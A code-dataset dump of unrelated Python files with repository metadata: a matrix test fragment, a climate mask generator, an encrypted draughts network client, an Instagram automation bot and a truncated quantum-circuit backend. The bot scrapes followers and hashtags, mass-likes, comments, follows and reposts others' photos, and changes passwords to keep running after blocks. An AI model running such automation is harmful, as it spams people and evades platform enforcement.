@it('Empty matrix raises ValueError')
@assert_raises(ValueError)
def _():
mf.element_wise_multiply([], [])
@it('2x2 Matrix')
def _():
assert mf.element_wise_multiply([[1, 2], [3, 4]],[[5.2, 2], [-3, -1]]) == [[5.2, 4], [-9, -4]]
@it('3x3 Matrix')
def _():
assert mf.element_wise_multiply([[1, 2, 3], [4, 5, 6], [7, 8, 9]], [[9, 7, 4], [7.1, -2, 0], [11, -7, 2]]) == [[9, 14, 12], [28.4, -10, 0], [77, -56, 18]]
@it('4x4 Matrix')
def _():
assert mf.element_wise_multiply([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]], [[1, -2, 3, -4], [-5, 6, -7, 8], [9, -10, 11, -12], [-13, 14, -15, 16]]) == [[1, -4, 9, -16], [-25, 36, -49, 64], [81, -100, 121, -144], [-169, 196, -225, 256]]
@it('5x5 Matrix')
def _():
assert mf.element_wise_multiply([[1, 2, 3, 4, 5], [6, 7, 8, 9, 10.1], [11, 12, 13, 14, 15], [1.5, 17, 13, 19, 20], [21, -22, 23, 24, 25]], [[7, 7, 7, 7, 7], [8, 8, 8, 8, 8], [9, -9, 9, -9, 9], [3, 4, 5, 6, 7], [11, 12, 13, 14, 14.1]]) == [[7, 14, 21, 28, 35], [48, 56, 64, 72, 80.8], [99, -108, 117, -126, 135], [4.5, 68, 65, 114, 140], [231, -264, 299, 336, 352.5]]
| 38.318493
| 413
| 0.42582
|
c05a3725f71337d8fc849530bab62b79c047f69e
| 5,371
|
py
|
Python
|
genesis/utils/make_mask.py
|
leifdenby/genesis
|
3e4942eac74fb9c69d9b3feedfce5aa745e3bf9c
|
[
"BSD-3-Clause"
] | 2
|
2019-12-18T15:39:06.000Z
|
2020-07-16T14:44:38.000Z
|
genesis/utils/make_mask.py
|
leifdenby/genesis
|
3e4942eac74fb9c69d9b3feedfce5aa745e3bf9c
|
[
"BSD-3-Clause"
] | 2
|
2019-12-26T11:23:11.000Z
|
2020-07-22T10:04:45.000Z
|
genesis/utils/make_mask.py
|
leifdenby/genesis
|
3e4942eac74fb9c69d9b3feedfce5aa745e3bf9c
|
[
"BSD-3-Clause"
] | 1
|
2019-12-18T16:48:39.000Z
|
2019-12-18T16:48:39.000Z
|
"""
Create mask files which can be used elsewhere
"""
import argparse
import inspect
import os
import xarray as xr
# register a progressbar so we can see progress of dask'ed operations with xarray
from dask.diagnostics import ProgressBar
from . import mask_functions
ProgressBar().register()
OUT_FILENAME_FORMAT = "{base_name}.mask.{mask_name}.nc"
class StoreDictKeyPair(argparse.Action):
"""
Custom parser so that we can provide extra values to mask functions
https://stackoverflow.com/a/42355279
"""
def __call__(self, parser, namespace, values, option_string=None):
my_dict = {}
for kv in values.split(","):
k, v = kv.split("=")
my_dict[k] = v
setattr(namespace, self.dest, my_dict)
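# Illustrative invocation (hypothetical values): `--extra k1=v1,k2=v2` stores
# {"k1": "v1", "k2": "v2"} on the namespace; values stay strings here and are
# type-cast later by build_method_kwargs.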
class MissingInputException(Exception):
def __init__(self, missing_kwargs, *args, **kwargs):
super().__init__(missing_kwargs, *args, **kwargs)
self.missing_kwargs = missing_kwargs
def make_mask_name(method, method_kwargs):
method_kwargs = build_method_kwargs(method=method, kwargs=method_kwargs)
def include_kw_in_name(v):
if v == "base_name":
return False
else:
return type(method_kwargs[v]) in [float, int, str]
name = ".".join(
[method]
+ [
"{v}{val}".format(v=v, val=method_kwargs[v])
for v in method_kwargs.keys()
if include_kw_in_name(v)
]
)
return name
def build_method_kwargs(method, kwargs):
"""
Use the provided arguments together with default ones and check which are
still missing to satisfy the function signature
"""
fn = getattr(mask_functions, method)
fn_argspec = inspect.getfullargspec(fn)  # getargspec is deprecated and removed in Python 3.11
needed_vars = fn_argspec.args
if fn_argspec.defaults is not None:
default_values = dict(
zip(fn_argspec.args[-len(fn_argspec.defaults) :], fn_argspec.defaults)
)
else:
default_values = {}
missing_kwargs = []
if "base_name" in kwargs and "base_name" not in needed_vars:
del kwargs["base_name"]
# we iterate over the function's required arguments and check if they've
# been passed in
for v in needed_vars:
if v in default_values:
if v in kwargs:
# attempt to type cast to the correct type
val = type(default_values.get(v))(kwargs[v])
kwargs[v] = val
else:
print(
"Using default value `{}` for argument `{}`".format(
default_values.get(v), v
)
)
kwargs[v] = default_values.get(v)
else:
if v not in kwargs:
missing_kwargs.append(v)
if len(missing_kwargs) > 0:
raise MissingInputException(missing_kwargs)
else:
return kwargs
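# Illustrative example (hypothetical mask function): for a signature like
# `def w_pos(w, z_max=700.0)`, build_method_kwargs("w_pos", {"z_max": "650"})
# casts "650" to float 650.0 and raises MissingInputException(["w"]) until a
# `w` field is supplied by the caller.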
def main(method, method_kwargs):
fn = getattr(mask_functions, method)
method_kwargs = build_method_kwargs(method=method, kwargs=method_kwargs)
mask = fn(**method_kwargs).squeeze()
if hasattr(fn, "description"):
mask.attrs["long_name"] = fn.description.format(**method_kwargs)
mask.name = make_mask_name(method, method_kwargs)
return mask
if __name__ == "__main__": # noqa
argparser = argparse.ArgumentParser(__doc__)
argparser.add_argument("base_name", type=str)
mask_function_names = [
o[0]
for o in inspect.getmembers(mask_functions)
if inspect.isfunction(o[1]) and not o[0].startswith("_")
]
argparser.add_argument("fn", choices=list(mask_function_names))
argparser.add_argument("--extra", action=StoreDictKeyPair, default={})
args = argparser.parse_args()
kwargs = dict(args.extra)
try:
kwargs = build_method_kwargs(method=args.fn, kwargs=kwargs)
except MissingInputException as e:
missing_kwargs = e.missing_kwargs
for v in missing_kwargs:
if v == "ds_profile":
case_name = args.base_name.split(".")[0]
filename = "{}.ps.nc".format(case_name)
if not os.path.exists(filename):
raise Exception(
"Could not find profile file, looked in "
"`{}`".format(filename)
)
kwargs[v] = xr.open_dataset(
filename, decode_times=False, chunks=dict(time=1)
)
elif v == "base_name":
kwargs["base_name"] = args.base_name
else:
filename = "{}.{}.nc".format(args.base_name, v)
if not os.path.exists(filename):
raise Exception(
"Can't find required var `{}` for mask "
"function `{}`, `{}`".format(v, args.fn, filename)
)
try:
kwargs[v] = xr.open_dataarray(
filename, decode_times=False, chunks=dict(zt=10)
)
except ValueError:
kwargs[v] = xr.open_dataarray(filename, decode_times=False)
mask = main(method=args.fn, method_kwargs=kwargs)
out_filename = OUT_FILENAME_FORMAT.format(
base_name=args.base_name, mask_name=mask.name
)
mask.to_netcdf(out_filename)
print("Wrote mask to `{}`".format(out_filename))
| 30.174157
| 82
| 0.587786
|
0189a0a202a5f97fe328b5ffb31e7d23c5baa424
| 4,252
|
py
|
Python
|
src/network/network_thread.py
|
insoPL/QtDraughts
|
62368e6523bf3dd50752ae5dffc65e946775f58d
|
[
"MIT"
] | null | null | null |
src/network/network_thread.py
|
insoPL/QtDraughts
|
62368e6523bf3dd50752ae5dffc65e946775f58d
|
[
"MIT"
] | null | null | null |
src/network/network_thread.py
|
insoPL/QtDraughts
|
62368e6523bf3dd50752ae5dffc65e946775f58d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import socket
from PyQt5.QtCore import QThread, pyqtSignal
import logging
import nacl.utils
import nacl.secret
import nacl.hash
from nacl.exceptions import CryptoError
class _NetworkThread(QThread):
got_connection = pyqtSignal()
connection_error = pyqtSignal(str)
new_msg = pyqtSignal(str)
def __init__(self, target_ip, port, passwd):
QThread.__init__(self)
self.port = int(port)
self.mode = None
self.target_ip = target_ip
self.socket = None
self.running = True
self.server_socket = None
keyhash = nacl.hash.blake2b(passwd.encode('ascii'), digest_size=16)
self.secret_box = nacl.secret.SecretBox(keyhash)
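# nacl.hash.blake2b hex-encodes its digest by default, so digest_size=16
# yields 32 ASCII bytes -- exactly the 32-byte key that SecretBox requires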
def send_raw(self, msg):
# logging.debug("[raw network pocket send] "+msg)
msg = self.secret_box.encrypt(msg.encode('ascii'))
self.socket.send(msg)
def recive_raw(self):
msg = self.socket.recv(1024)
try:
msg = self.secret_box.decrypt(msg)
except CryptoError:
#self.connection_error.emit("Wrong password")
#self.running = False
return ""
msg = msg.decode('ascii')
# logging.debug("[raw network pocket recived] "+msg)
return msg
def __del__(self):
self.quit()
self.wait()
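# Handshake used by the two subclasses below: the server sends "welcome" and
# the client answers "welcomeback"; a message that fails to decrypt is read
# back as "" and reported to the peer as a wrong password.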
class NetworkClient(_NetworkThread):
def run(self):
self.mode = "client"
logging.info("Connecting to :" + str(self.target_ip))
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.socket.connect((self.target_ip, self.port))
logging.debug("Connection sucessful")
if self.recive_raw() != "welcome":
self.connection_error.emit("Wrong Password")
return
self.send_raw("welcomeback")
self.got_connection.emit()
self.socket.settimeout(1)
while self.running:
try:
msg = self.recive_raw()
if msg == "":
break
self.new_msg.emit(msg)
except socket.timeout:
continue
except socket.error as err:
logging.debug("SOCKET ERROR: %s" % err)
self.connection_error.emit(str(err))
return
finally:
self.socket.close()
logging.debug("Server Closed")
class NetworkServer(_NetworkThread):
def run(self):
self.mode = "server"
logging.info("Hosting :" + str(self.target_ip))
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.server_socket.bind((self.target_ip, self.port))
logging.debug("Server ready for network")
self.server_socket.settimeout(1)
self.server_socket.listen(1)
while self.running:
try:
self.socket, client_addr = self.server_socket.accept()
except socket.timeout:
continue
break
if not self.running:
logging.debug("Hosting canceled")
return
logging.debug("Connection established.")
self.send_raw("welcome")
if self.recive_raw() != "welcomeback":
self.connection_error.emit("Wrong Password")
return
self.got_connection.emit()
self.socket.settimeout(1)
while self.running:
try:
msg = self.recive_raw()
if msg == "":
break
self.new_msg.emit(msg)
except socket.timeout:
continue
except socket.error as err:
logging.debug("SOCKET ERROR: %s" % err)
self.server_socket.close()
self.server_socket = None
self.connection_error.emit("Connection error.")
finally:
if self.socket is not None:
self.socket.close()
if self.server_socket is not None:
self.server_socket.close()
logging.debug("Server Closed")
| 32.212121
| 78
| 0.5508
|
ef04807445887ef401cb4c8218bcd3c992d61ab5
| 23,609
|
py
|
Python
|
instabotai/ai.py
|
Chililove/instabotai
|
07cfbae22abf3c508d3ca13308149dc22991aeff
|
[
"Apache-2.0"
] | null | null | null |
instabotai/ai.py
|
Chililove/instabotai
|
07cfbae22abf3c508d3ca13308149dc22991aeff
|
[
"Apache-2.0"
] | null | null | null |
instabotai/ai.py
|
Chililove/instabotai
|
07cfbae22abf3c508d3ca13308149dc22991aeff
|
[
"Apache-2.0"
] | null | null | null |
import os
from instabot import Bot
import argparse
import time
#import threading
import random
import sys, stat
from mtcnn.mtcnn import MTCNN
import cv2
#import json
#import logging
import shutil
try:
input = raw_input
except NameError:
pass
COOKIES = {}
bot = Bot(do_logout=True)
class Bots(object):
def __init__(self):
self.points = 1000
def watch_stories(username, time_sleep):
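"""Random-walk story viewer: fetch recent likers of `username`, watch their
stories, then hop to a random liker and repeat, sleeping `time_sleep`
seconds between rounds."""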
Bots.save_user_info(ig_username, "Starting story viewer")
user_to_get_likers_of = bot.get_user_id_from_username(username)
time_sleep = int(time_sleep)
current_user_id = user_to_get_likers_of
total_stories = 0
error_sleep = 0
error_sleeps = 0
while True:
try:
# GET USER FEED
if not bot.api.get_user_feed(current_user_id):
print("Can't get feed of user_id=%s" % current_user_id)
Bots.save_user_info(ig_username, "Can't get feed of user_id=%s" % current_user_id)
# GET MEDIA LIKERS
user_media = random.choice(bot.api.last_json["items"])
if not bot.api.get_media_likers(media_id=user_media["pk"]):
Bots.save_user_info(ig_username,
"Can't get media likers of media_id='%s' by user_id='%s'"
% (user_media["pk"], current_user_id)
)
likers = bot.api.last_json["users"]
liker_ids = [
str(u["pk"]) for u in likers if not u["is_private"] and "latest_reel_media" in u
][:20]
# WATCH USERS STORIES
if bot.watch_users_reels(liker_ids):
time.sleep(time_sleep)
Bots.save_user_info(ig_username, "sleeping for " + str(time_sleep) + " seconds")
bot.logger.info("Total stories viewed: %d" % bot.total["stories_viewed"])
Bots.save_user_info(ig_username, "Total stories viewed: %d" % bot.total["stories_viewed"])
error_sleep = 0
error_sleeps = 0
if bot.total["stories_viewed"] > 1900:
total_stories += 2000
Bots.save_user_info(ig_username, "Total stories watched " + str(total_stories))
print("Total stories watched " + str(total_stories))
bot.total["stories_viewed"] = 0
print("sleeping for 420 sec")
Bots.save_user_info(ig_username, "sleeping for 420 sec")
Bots.payment_system()
time.sleep(420 + random.random())
if total_stories > 19000:
time.sleep(500)
Bots.save_user_info(ig_username, "sleeping for 500 seconds")
# CHOOSE RANDOM LIKER TO GRAB HIS LIKERS AND REPEAT
current_user_id = random.choice(liker_ids)
if random.random() < 0.05:
time.sleep(1)
current_user_id = user_to_get_likers_of
bot.logger.info("Sleeping and returning back to original user_id=%s"% current_user_id)
Bots.save_user_info(ig_username, "Sleeping and returning back to original user_id=%s"% current_user_id)
time.sleep(10 * random.random() + 1)
error_sleep += 1
if error_sleep == 2:
error_sleep = 0
print("sleeping for 1640 seconds")
Bots.save_user_info(ig_username, "sleeping for 320 seconds")
time.sleep(16 + random.random())
except Exception as e:
# If something went wrong - sleep long and start again
bot.logger.info(e)
error_sleeps += 1
if error_sleeps == 50:
bot.logger.info("sleeping for 310 seconds")
Bots.save_user_info(ig_username, "sleeping for 310 seconds")
time.sleep(312 + random.random())
Bots.change_password_on_block()
print(bot.api.total_challenge)
current_user_id = user_to_get_likers_of
time.sleep(20 * random.random() + 5)
def change_password_on_block():
# "a+" creates the flag file if missing without truncating it ("w+" erased
# the flag before it could be read, so a block was never detected)
with open(ig_username + "check_blocked.txt", "a+") as f:
f.seek(0)
blocked = f.read().strip()
if blocked == "3":
Bots.save_user_info(ig_username, "Change password")
x = random.randrange(1, 3)
new_password = ig_password + str(x)
bot.api.change_password(new_password)
bot.logger.info("password changed")
# log back in as this account (the username was hard-coded before)
bot.api.login(username=ig_username, password=new_password)
bot.logger.info("logged in")
f.truncate(0)
f.seek(0)
f.write("0")
def save_user_info(username, logoutput):
global ig_username
ig_username = username
path = "static/" + username + 'info.txt'
# 'a+' always appends, so the old read/seek/write never prepended anything;
# read the existing log first, then rewrite it with the newest entry on top
try:
with open(path) as f:
s = f.read()
except IOError:
s = ""
with open(path, 'w') as f:
f.write(logoutput + "<hr>\n" + s)
def user_login(username=None, password=None, proxys=None):
username = username
global ig_password
ig_password = password
proxys = None
bot.api.login(username=username, password=password, proxy=proxys, use_cookie=True, is_threaded=True)
Bots.save_user_info(username, "logged in as " + username)
def face_detection(username):
x = 0
''' Get user media and scan it for a face'''
user_id = bot.get_user_id_from_username(username)
medias = bot.get_user_medias(user_id, filtration=False)
for media in medias:
while x < 1:
try:
bot.logger.info(media)
path = bot.download_photo(media, folder=username)
img = cv2.imread(path)
detector = MTCNN()
detect = detector.detect_faces(img)
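# MTCNN.detect_faces returns one dict per detected face (bounding box,
# keypoints, confidence); an empty list means no face in the downloaded photo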
if not detect:
Bots.save_user_info(ig_username, "no face detected " + bot.get_link_from_media_id(media))
bot.logger.info("save user info")
bot.logger.info("no face detected " + bot.get_link_from_media_id(media))
x += 1
elif detect:
Bots.save_user_info(ig_username, "there was a face detected")
bot.logger.info("save user info")
bot.logger.info("there was a face detected")
bot.api.like(media)
display_url = bot.get_link_from_media_id(media)
bot.logger.info("liked " + display_url + " by " + username)
Bots.save_user_info(ig_username, "liked " + display_url + " by " + username)
Bots.payment_system()
x += 1
else:
x += 1
except Exception as e:
Bots.save_user_info(ig_username, str(e))
bot.logger.info(e)
x += 1
shutil.rmtree(username, ignore_errors=True) # Remove dir username after scanning
def face_detection_repost(username, caption):
x = 0
''' Get user media and scan it for a face'''
user_id = bot.get_user_id_from_username(username)
medias = bot.get_user_medias(user_id, filtration=False)
for media in medias:
while x < 1:
try:
bot.logger.info(media)
path = bot.download_photo(media, folder=username)
img = cv2.imread(path)
detector = MTCNN()
detect = detector.detect_faces(img)
if not detect:
bot.logger.info("no face detected " + bot.get_link_from_media_id(media))
Bots.save_user_info(ig_username, "no face detected " + bot.get_link_from_media_id(media))
x += 1
elif detect:
bot.logger.info("there was a face detected")
Bots.save_user_info(ig_username, "==> There was a face detected! <==")
bot.api.upload_photo(path, caption=caption)
does_exist = bot.get_media_comments(media, only_text=True)
if str(username) in does_exist:
x += 1
print("image has been commented")
else:
display_url = bot.get_link_from_media_id(media)
bot.logger.info("reposted " + display_url + " by " + username)
Bots.save_user_info(ig_username, "reposted " + display_url + " by " + username)
Bots.payment_system()
x += 1
else:
x += 1
except Exception as e:
bot.logger.info(e)
x += 1
Bots.save_user_info(ig_username, str(e))
shutil.rmtree(username, ignore_errors=True) # Remove dir username after scanning
def face_detection_follow(username):
Bots.save_user_info(ig_username, "No Worries pls wait 10-120 seconds")
x = 0
''' Get user media and scan it for a face'''
user_id = bot.get_user_id_from_username(username)
medias = bot.get_user_medias(user_id, filtration=False)
for media in medias:
while x < 1:
try:
bot.logger.info(media)
path = bot.download_photo(media, folder=username)
img = cv2.imread(path)
detector = MTCNN()
detect = detector.detect_faces(img)
if not detect:
bot.logger.info("no face detected " + bot.get_link_from_media_id(media))
Bots.save_user_info(ig_username, "no face detected " + bot.get_link_from_media_id(media))
x += 1
elif detect:
bot.logger.info("there was a face detected")
Bots.save_user_info(ig_username, "there was a face detected")
bot.api.follow(user_id)
does_exist = bot.get_media_comments(media, only_text=True)
if str(username) in does_exist:
x += 1
bot.logger.info("user has been followed")
else:
display_url = bot.get_link_from_media_id(media)
Bots.save_user_info(ig_username, "followed " + username)
bot.logger.info("followed " + username)
Bots.payment_system()
x += 1
else:
x += 1
except Exception as e:
bot.logger.info(e)
x += 1
Bots.save_user_info(ig_username, str(e))
shutil.rmtree(username, ignore_errors=True) # Remove dir username after scanning
def face_detection_comment(username, comment):
x = 0
''' Get user media and scan it for a face'''
user_id = bot.get_user_id_from_username(username)
medias = bot.get_user_medias(user_id, filtration=False)
for media in medias:
while x < 1:
try:
bot.logger.info(media)
path = bot.download_photo(media, folder=username)
img = cv2.imread(path)
detector = MTCNN()
detect = detector.detect_faces(img)
if not detect:
bot.logger.info("no face detected " + bot.get_link_from_media_id(media))
Bots.save_user_info(ig_username, "no face detected " + bot.get_link_from_media_id(media))
x += 1
elif detect:
comment = Bots.convert_usernames_to_list(comment)
comment = random.choice(comment)
bot.logger.info("there was a face detected")
Bots.save_user_info(ig_username, "there was a face detected")
bot.api.comment(media, comment)
does_exist = bot.get_media_comments(media, only_text=True)
if str(username) in does_exist:
x += 1
print("image has been commented")
else:
display_url = bot.get_link_from_media_id(media)
bot.logger.info("commented " + display_url + " by " + username)
Bots.save_user_info(ig_username, "commented " + display_url + " by " + username)
Bots.payment_system()
x += 1
else:
x += 1
except Exception as e:
Bots.save_user_info(ig_username, "wait 1 min")
bot.logger.info(e)
x += 1
shutil.rmtree(username, ignore_errors=True) # Remove dir username after scanning
def like_followers(username, time_sleep):
Bots.save_user_info(ig_username, "Scraping users pls wait 2-4 min")
user_id = bot.get_user_id_from_username(username)
followers = bot.get_user_followers(user_id, nfollows=6000)
for user in followers:
pusername = bot.get_username_from_user_id(user)
Bots.face_detection(pusername)
time.sleep(int(time_sleep))
def like_following(username, time_sleep):
Bots.save_user_info(ig_username, "Scraping users pls wait 2-4 min")
user_id = bot.get_user_id_from_username(username)
following = bot.get_user_following(user_id)
for user in following:
pusername = bot.get_username_from_user_id(user)
Bots.face_detection(pusername)
time.sleep(int(time_sleep))
def like_hashtags(hashtag, time_sleep):
'''
like hashtags
@params: hashtag (string),
@params: time_sleep (int),
'''
Bots.save_user_info(ig_username, "Scraping users pls wait 2-4 min")
while True:
hashtags = Bots.convert_usernames_to_list(hashtag)
for hashtag in hashtags:
hashtags = bot.get_hashtag_users(hashtag)
bot.logger.info("Hashtag selected: " + hashtag)
for user in hashtags:
pusername = bot.get_username_from_user_id(user)
Bots.face_detection(pusername)
time.sleep(int(time_sleep))
def user_hashtag_comment(hashtag, comment, time_sleep):
'''
comment a user hashtags
@params: hashtag (string),
@params: comment (string),
@params: time_sleep (int),
'''
while True:
hashtags = Bots.convert_usernames_to_list(hashtag)
for hashtag in hashtags:
hashtags = bot.get_hashtag_users(hashtag)
bot.logger.info("Hashtag selected: " + hashtag)
for user in hashtags:
pusername = bot.get_username_from_user_id(user)
Bots.face_detection_comment(pusername, comment)
time.sleep(int(time_sleep))
def media_hashtag_comment(hashtags, comment, time_sleep):
'''
comment a media hashtags
@params: hashtags (string),
@params: comment (string),
@params: time_sleep(int),
'''
Bots.save_user_info(ig_username, "Scraping users pls wait 2-4 min")
while True:
hashtags = Bots.convert_usernames_to_list(hashtags)
for hashtag in hashtags:
hashtags = bot.get_total_hashtag_medias(hashtag)
for user in hashtags:
pusername = bot.get_username_from_user_id(user)
Bots.face_detection_comment(pusername, comment)
time.sleep(int(time_sleep))
def unfollow_users():
bot.unfollow_everyone()
def unfollow_non_followers():
bot.unfollow_non_followers()
def convert_usernames_to_list(usernames):
newlist = []
''' convert usernames or hashtags to a list '''
try:
for username in usernames.split(", "):
newlist.append(username)
list_usernames = newlist
except:
for username in usernames.split(","):
newlist.append(username)
list_usernames = newlist
else:
usernames = list_usernames
return list_usernames
def repost_users_images(usernames, caption, time_sleep):
'''
get users images and repost them
@params: usernames (string),
@params: caption (sting),
@params: time_sleep(int),
'''
print(usernames)
Usernames = Bots.convert_usernames_to_list(usernames)
print(Usernames)
for username in Usernames:
Bots.face_detection_repost(username, caption)
time.sleep(time_sleep)
def get_points():
try:
with open(ig_username + "x.txt", "r") as f:
points = f.read()
if not points:
Bots.stop()
return points
except IOError:
# first run: create the balance file with 50 starter coins (the old code
# opened the file write-only and then tried to read it back, which raises)
with open(ig_username + "x.txt", "w") as f:
f.write("50")
os.chmod(ig_username + "x.txt", 0o777)
return "50"
def stop():
print("Buy 20.000 more COINS send 0.001 BTC to 12R5b4rLyNL8cC2HYQi5NpdPNaaAxPnmfe")
print("To get key when bought talk to us here: https://web.telegram.org/#/im?p=@instabotai")
exit()
def payment_system():
points = Bots.get_points()
print("You Have :" + str(points) + " coins left")
Bots.save_user_info(ig_username, "You Have :" + str(points) + " coins left")
increase = open(ig_username + "x.txt", "w+")
points = int(points)
points -= 1
if points < 0:
increase.write("0")
print("Buy More Coins Here https://www.patreon.com/instabotai")
Bots.save_user_info(ig_username, "Buy for 1 month for only $29 with unlimited tasks <a href='https://www.fiverr.com/hourapp/manage-your-instagram-account-with-ai'> Here!</a>")
print("To get key when bought talk to us here: https://web.telegram.org/#/im?p=@instabotai")
Bots.stop()
increase.write(str(points))
increase.close()
print("=" * 30)
Bots.save_user_info(ig_username, "=" * 30)
Bots.save_user_info(ig_username, "Buy 1 month for only $29 with unlimited tasks<a href='https://www.fiverr.com/hourapp/manage-your-instagram-account-with-ai' target='_blank'> Here!</a>")
print("Buy 20.000 more COINS send 0.001 BTC to 12R5b4rLyNL8cC2HYQi5NpdPNaaAxPnmfe")
print("To get key when bought talk to us here: https://web.telegram.org/#/im?p=@instabotai")
Bots.save_user_info(ig_username, "For support talk to us here: <a href='https://web.telegram.org/#/im?p=@instabotai' target='_blank'> Here!</a>")
def activate_code(code):
# every valid code credits 1000 coins; the original first two branches added
# 1000 to the string returned by get_points (a TypeError) and never saved the
# result, so all three codes now share the one working branch
if code in ("AAAEASDCCF", "BBBSDRGTY", "CCCAASDRT"):
points = str(int(Bots.get_points()) + 1000)
print(points)
with open(ig_username + "x.txt", "w+") as f:
f.write(points)
print("You have activated your code")
else:
print("wrong code")
def follow_users_following_ai(username, time_sleep):
Bots.save_user_info(ig_username, "Scraping users pls wait 2-4 min")
while True:
try:
username = Bots.convert_usernames_to_list(username)
for user in username:
user_id = bot.get_user_id_from_username(user)
followings = bot.get_user_following(user_id, nfollows=2000)
for user_id in followings:
username = bot.get_username_from_user_id(user_id)
Bots.face_detection_follow(username)
time_sleep = int(time_sleep)
time.sleep(time_sleep)
except:
user_id = bot.get_user_id_from_username(username)
followings = bot.get_user_following(user_id, nfollows=2000)
for user_id in followings:
username = bot.get_username_from_user_id(user_id)
Bots.face_detection_follow(username)
time_sleep = int(time_sleep)
time.sleep(time_sleep)
def follow_users_followers_ai(username, time_sleep):
Bots.save_user_info(ig_username, "Scraping users pls wait 2-4 min")
while True:
try:
username = Bots.convert_usernames_to_list(username)
for user in username:
user_id = bot.get_user_id_from_username(user)
followers = bot.get_user_followers(user_id, nfollows=2000)
for user_id in followers:
username = bot.get_username_from_user_id(user_id)
Bots.face_detection_follow(username)
time_sleep = int(time_sleep)
time.sleep(time_sleep)
except:
user_id = bot.get_user_id_from_username(username)
followers = bot.get_user_followers(user_id, nfollows=2000)
for user_id in followers:
username = bot.get_username_from_user_id(user_id)
Bots.face_detection_follow(username)
time_sleep = int(time_sleep)
time.sleep(time_sleep)
def follow_users_hashtag_ai(hashtag, time_sleep):
Bots.save_user_info(ig_username, "Scraping users pls wait 2-4 min")
while True:
hashtags = Bots.convert_usernames_to_list(hashtag)
for hashtag in hashtags:
hashtags = bot.get_hashtag_users(hashtag)
for user in hashtags:
username = bot.get_username_from_user_id(user)
Bots.face_detection_follow(username)
time.sleep(time_sleep)
| 43.559041
| 194
| 0.540853
|
be3b7467b0888fe86f0901469e076b4b751c9973
| 25,484
|
py
|
Python
|
quasar/backend.py
|
qfizik/quasar
|
405cf60283be79adda59a6eed27fe866e2e18288
|
[
"Apache-2.0"
] | 1
|
2020-07-15T16:01:27.000Z
|
2020-07-15T16:01:27.000Z
|
quasar/backend.py
|
qfizik/quasar
|
405cf60283be79adda59a6eed27fe866e2e18288
|
[
"Apache-2.0"
] | null | null | null |
quasar/backend.py
|
qfizik/quasar
|
405cf60283be79adda59a6eed27fe866e2e18288
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import collections
import sortedcontainers
from .pauli import Pauli, PauliExpectation, PauliString
from .algebra import Algebra
from .circuit import Gate, Circuit
class Backend(object):
""" Class Backend represents a physical or simulated quantum circuit
resource. Backends must implement `run_measurement`, from which many
higher-order quantities may be computed, e.g., `run_pauli_expectation`,
`run_pauli_expectation_value`, `run_pauli_expectation_value_gradient`,
etc. Backends supporting classical statevector-based simulation may
also optionally implement `run_statevector,` from which many additional
higher-order quantities may be computed, e.g., `run_unitary`,
`run_density_matrix`, and ideal-infinite-sampled versions of the
previously-discussed higher-order quantities. Backends may additionally
overload any of the stock higher-order methods declared here,
potentially providing increased performance or additional methodology.
"""
def __init__(
self,
):
""" Constructor, initializes and holds quantum resource pointers such
as API keys.
Backend subclasses should OVERLOAD this method.
"""
pass
def __str__(self):
""" A 1-line string representation of this Backend
Returns:
(str) - 1-line string representation of this Backend
Backend subclasses should OVERLOAD this method.
"""
raise NotImplementedError
@property
def summary_str(self):
""" A more-extensive string representation of this Backend, optionally
including current hardware state.
Returns:
(str) - multiline string representation of this Backend
Backend subclasses should OVERLOAD this method.
"""
raise NotImplementedError
@property
def has_run_statevector(
self,
):
""" Does this Backend support run_statevector?
Returns:
(bool) - True if run_statevector is supported else False.
Backend subclasses should OVERLOAD this method.
"""
raise NotImplementedError
@property
def has_statevector_input(
self,
):
""" Does this Backend allow statevector to be passed as input argument
to various run methods?
Returns:
(bool) - True if statevector input arguments can be supplied else
False.
Backend subclasses should OVERLOAD this method.
"""
raise NotImplementedError
def run_statevector(
self,
circuit,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
raise NotImplementedError
def run_pauli_sigma(
self,
pauli,
statevector,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
min_qubit = pauli.min_qubit if min_qubit is None else min_qubit
nqubit = pauli.nqubit if nqubit is None else nqubit
pauli_gates = {
'X' : Gate.X,
'Y' : Gate.Y,
'Z' : Gate.Z,
}
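# apply each Pauli string as a small circuit of X/Y/Z gates and accumulate
# the value-weighted results: sigma = sum_s c_s * P_s |psi>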
statevector2 = np.zeros_like(statevector)
for string, value in pauli.items():
circuit2 = Circuit()
for qubit, char in string:
circuit2.add_gate(pauli_gates[char], qubit)
statevector3 = self.run_statevector(
circuit=circuit2,
statevector=statevector,
dtype=dtype,
min_qubit=min_qubit,
nqubit=nqubit,
)
statevector2 += value * statevector3
return statevector2
def run_pauli_diagonal(
self,
pauli,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
min_qubit = pauli.min_qubit if min_qubit is None else min_qubit
nqubit = pauli.nqubit if nqubit is None else nqubit
# All I or Z strings
pauli2 = Pauli.zero()
for string, value in pauli.items():
if len(string) == 0 or all(_ == 'Z' for _ in string.chars):
pauli2[string] = value
statevector = np.ones((2**nqubit,), dtype=dtype)
return self.run_pauli_sigma(
pauli=pauli2,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
def run_unitary(
self,
circuit,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
nqubit = circuit.nqubit if nqubit is None else nqubit
U = np.zeros((2**nqubit,)*2, dtype=dtype)
for i in range(2**nqubit):
statevector = np.zeros((2**nqubit,), dtype=dtype)
statevector[i] = 1.0
U[:, i] = self.run_statevector(circuit, statevector=statevector, dtype=dtype, **kwargs)
return U
def run_density_matrix(
self,
circuit,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
statevector = self.run_statevector(
circuit=circuit,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
return np.outer(statevector, statevector.conj())
def run_measurement(
self,
circuit,
nmeasurement=None,
statevector=None,
min_qubit=None,
nqubit=None,
dtype=np.complex128,
**kwargs):
statevector = self.run_statevector(
circuit=circuit,
statevector=statevector,
min_qubit=min_qubit,
nqubit=nqubit,
dtype=dtype,
**kwargs)
return Algebra.sample_histogram_from_probabilities(
probabilities=(np.conj(statevector) * statevector).real,
